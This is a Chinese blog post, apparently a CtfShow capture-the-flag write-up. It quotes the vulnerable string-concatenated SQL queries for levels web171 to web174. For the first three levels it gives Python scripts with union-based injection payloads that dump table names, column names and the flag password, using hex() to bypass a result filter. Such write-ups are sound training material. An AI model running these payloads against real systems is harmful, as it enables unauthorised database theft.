侧边栏壁纸
  • 累计撰写 19 篇文章
  • 累计创建 18 个标签
  • 累计收到 10 条评论
CTF

CtfShow之SQL注入-持续更新

小海
2022-10-19 / 0 评论 / 0 点赞 / 918 阅读 / 2,397 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2022-10-19,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

CtfShow之SQL注入

web171

查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
#无过滤的字符型注入。
import requests
url = "http://66e1d748-4475-4aa9-8c95-fb3737690e46.challenge.ctf.show/api/?id="
# 查数据库
tablename = "-1' union select 1,2,group_concat(table_name) from information_schema.tables  where table_schema=database() --+"
# 查列名
columnname = "-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"
# 查数据
payload = "-1' union select id,username,password from ctfshow_user --+"
res = requests.get(url+payload)
print(res.text)

web172

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if($row->username!=='flag'){
    $ret['msg']='查询成功';
}
#无过滤的字符型注入,添加了条件限制 username!='flag'
import requests
url = "http://669d6879-73f9-4a49-97ac-56ca927f63b2.challenge.ctf.show/api/v2.php?id="
tablename = "0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
columnname = "0' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+"
payload = "0' union select 1,(select password from ctfshow_user2 where username='flag') --+"
res = requests.get(url+payload)
print(res.text)

web173

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
过滤了字符类型的注入,添加了检查结果中是否匹配正则表达式/flag/i
使用hex函数绕过正则过滤
import requests
url = "http://8926a547-bbc7-4a5b-a20a-215fdc2c4037.challenge.ctf.show/api/v3.php?id="
tablename = "-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+"
columnname = "-1' union select 1,2,hex((select group_concat(column_name) from information_schema.columns where table_name = 'ctfshow_user3')) --+"
payload = "-1' union select 1,2,hex((select password from ctfshow_user3 where username='flag')) --+"
res = requests.get(url+payload)
print(res.text)

web174

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

0

评论区